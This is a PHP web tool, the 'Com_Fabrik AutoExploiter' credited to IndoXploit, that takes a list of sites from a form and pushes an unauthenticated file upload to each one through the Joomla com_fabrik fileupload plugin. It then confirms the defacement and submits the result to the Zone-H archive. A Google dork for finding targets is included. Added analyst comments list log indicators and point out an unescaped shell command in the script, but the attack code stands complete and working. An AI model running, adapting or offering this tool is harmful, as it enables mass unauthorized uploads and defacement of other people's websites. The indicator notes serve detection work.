- <!-- Operator form for the script below: one textarea ("sites") and a submit button ("die"), posted back to this same page. The title string and the two field names are fixed text that can be searched for when checking a web root for a copy of this tool. -->
- <head><title>Com_Fabrik AutoExploiter ~</title></head>
- <link href='https://fonts.googleapis.com/css?family=Ubuntu' rel='stylesheet' type='text/css'>
- <style type="text/css">
- body { background:black;font-family: Ubuntu ; color:#fff; padding:50px}
- .text {width:600px;height:200px;font-family: Ubuntu ; border: 1px solid darkred; }
- .btn {background:#b70505;color:white;border: 1px solid #000; padding:6px 6px 6px 6px;font-family: Ubuntu ;}
- .btn:hover {background:#c0bfbf;color:#000000; font-family: Ubuntu ; }
- </style>
- <center> <font new size="5">Com_Fabrik AutoExploiter ~</font><br>
- <form action="" method="POST">
- <textarea class="text" name="sites"></textarea>
- <br>
- <input class="btn" type="submit" value="door" name="die">
- </form>
- </center>
- <?php
- /** webBased By UstadCage_48 **/
- /**
- Joomla Component com_fabrik Arbitrary File Upload
- Author: Et04 & bL@cKID
- Google Dork
- inurl:/index.php?option=com_fabrik
- Auto Exploiter (Auto Upload & Auto Submit Zone-H)
- Coded by: L0c4lh34rtz - IndoXploit
- */
- /**
-  * Analyst notes on this class (code left exactly as found).
-  *
-  * Bulk driver for the com_fabrik file-upload issue named in the file header: for each
-  * host it sends one multipart upload to the component's fileupload plugin endpoint,
-  * fetches the URI the server returns, and, when the fetched page matches /hacked/i,
-  * reports the URI to a defacement archive and appends it to a local log.
-  *
-  * Indicators a defender can take from the visible code:
-  *  - request query string: option=com_fabrik ... task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
-  *  - User-Agent "IndoXploitTools/1.1" on requests made through curl() (the follow-up GET and the archive POST)
-  *  - the upload itself is sent by the curl command-line binary with no user-agent option, so it carries
-  *    that binary's default agent, not the string above
-  *  - files created or read in the working directory: 48.htm, cookie.txt, result_fabrik.txt
-  */
- Class IDX_Fabrik {
- /* Target base URL; set by the caller for each line of the submitted list. */
- public $url;
- /* Local file sent as the upload body; the original note says it sits in the same folder as this tool. */
- private $file = "48.htm";
- /* Handle sent as the "defacer" field in zoneh(). */
- /* exploit() only treats an upload as successful when the fetched page matches /hacked/i; the original note asks for that word in the uploaded file for this reason. */
- public $hacker = "USTADCAGE_48";
- /**
-  * Returns $this->url, prefixed with "http://" when it starts with neither "http://" nor "https://".
-  * Despite the name, no other validation is performed.
-  */
- public function validUrl() {
- if(!preg_match("/^http:\/\//", $this->url) AND !preg_match("/^https:\/\//", $this->url)) {
- $url = "http://".$this->url;
- return $url;
- } else {
- return $this->url;
- }
- }
- /**
-  * Thin wrapper around the PHP curl extension.
-  *
-  * $url     address to request
-  * $data    when not null, sent as a POST body
-  * $headers when not null, passed as extra request headers
-  * $cookie  when exactly true, cookie.txt in the working directory is used as cookie file and jar
-  *
-  * Returns an object with "response" (curl_exec result) and "info" (curl_getinfo result).
-  * Errors from curl_exec are not checked here.
-  */
- public function curl($url, $data = null, $headers = null, $cookie = true) {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
- curl_setopt($ch, CURLOPT_URL, $url);
- // Fixed, distinctive agent string: a direct match target for web-server and proxy logs.
- curl_setopt($ch, CURLOPT_USERAGENT, "IndoXploitTools/1.1");
- //curl_setopt($ch, CURLOPT_VERBOSE, TRUE);
- // Certificate and host-name verification are both switched off for every request.
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
- // Five seconds to connect and five seconds in total per request.
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt($ch, CURLOPT_TIMEOUT, 5);
- if($data !== null) {
- curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
- curl_setopt($ch, CURLOPT_POST, TRUE);
- curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
- }
- if($headers !== null) {
- curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
- }
- if($cookie === true) {
- curl_setopt($ch, CURLOPT_COOKIE, TRUE);
- // cookie.txt is read and written relative to the working directory: a host-side artifact.
- curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
- curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
- }
- $exec = curl_exec($ch);
- $info = curl_getinfo($ch);
- curl_close($ch);
- return (object) [
- "response" => $exec,
- "info" => $info
- ];
- }
- /**
-  * Sends the upload for $this->url and reports the outcome as HTML.
-  *
-  * The request carries no cookie or credential option, so as written it is sent unauthenticated.
-  * The response is decoded as JSON: an "error" key prints [FAILED]; a "uri" key is fetched through
-  * curl() and, if the body matches /hacked/i, printed as [OK], passed to zoneh() and to save().
-  * Any other response prints nothing. Nothing is returned.
-  *
-  * Defender notes:
-  *  - the query string on the first line is the log-hunting signature for this tool; a hit followed by
-  *    a GET for a newly created file from the same client is the pattern this method produces
-  *  - mitigation belongs on the target side: patch or remove the component as its vendor advises and
-  *    review the upload directories of any site that logged such a request
-  *  - NOTE(review): $this->url comes from the submitted form and is placed in a shell command line
-  *    without escaping, so a copy of this script reachable over the web is itself a command-execution
-  *    risk for the host serving it; treat any host where it is found accordingly
-  */
- public function exploit() {
- $url = $this->url."/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload";
- //$post = $this->curl($url, ["file" => "@L0c.htm"], null, false);
- // Shells out to the curl binary instead of using curl(); "@" suppresses PHP warnings from shell_exec.
- $post = @shell_exec("curl --silent --connect-timeout 5 -X POST -F \"file=@".$this->file."\" \"$url\"");
- $result = (object) json_decode($post, true);
- if(isset($result->error)) {
- print "# ".parse_url($this->url, PHP_URL_HOST)." <font color=red>[FAILED]</font><br>";
- } else {
- if(isset($result->uri)) {
- // Second request: fetches the returned URI with the IndoXploitTools agent string.
- if(preg_match("/hacked/i", $this->curl($result->uri)->response)) {
- print "# ".$result->uri." <font color=green>[OK]</font><br>";
- $this->zoneh($result->uri);
- $this->save($result->uri);
- }
- }
- }
- }
- /**
-  * Posts $url and the configured handle to the notify form of the defacement archive and prints
-  * [ERROR] or [OK] depending on the red text found in the reply. If the first pattern does not
-  * match, nothing is printed. The detailed error text is captured in $matches2 but never used.
-  * From a monitoring view this is an outbound POST from the hosting server to that archive.
-  */
- public function zoneh($url) {
- $post = $this->curl("http://www.zone-h.com/notify/single", "defacer=".$this->hacker."&domain1=$url&hackmode=1&reason=1&submit=Send",null,false);
- if(preg_match("/color=\"red\">(.*?)<\/font><\/li>/i", $post->response, $matches)) {
- if($matches[1] === "ERROR") {
- preg_match("/<font color=\"red\">ERROR:<br\/>(.*?)<br\/>/i", $post->response, $matches2);
- print "# Zone-H ($url) <font color=red>[ERROR]</font><br><br>";
- } else {
- print "# Zone-H ($url) <font color=green>[OK]</font><br><br>";
- }
- }
- }
- /**
-  * Appends "$isi<br>" to result_fabrik.txt in the working directory. On a host where this script
-  * has run, that file is a record of the URIs it reported as successful. The fopen result is
-  * not checked.
-  */
- public function save($isi) {
- $handle = fopen("result_fabrik.txt", "a+");
- fwrite($handle, "$isi<br>");
- fclose($handle);
- }
- }
- // Entry point: runs on every page load; no login, token or origin check appears anywhere in this
- // listing, so anyone who can reach the page can submit the form.
- $fabrik = new IDX_Fabrik();
- // Acts only when the submit button field "die" is present and truthy.
- if($_POST['die']){
- // One target per line of the "sites" textarea.
- $open = explode("\n",$_POST['sites']);
- foreach($open as $list) {
- $fabrik->url = trim($list);
- $fabrik->url = $fabrik->validUrl();
- // exploit() prints its own output and returns nothing, so this echo adds no text.
- echo $fabrik->exploit();
- }
- }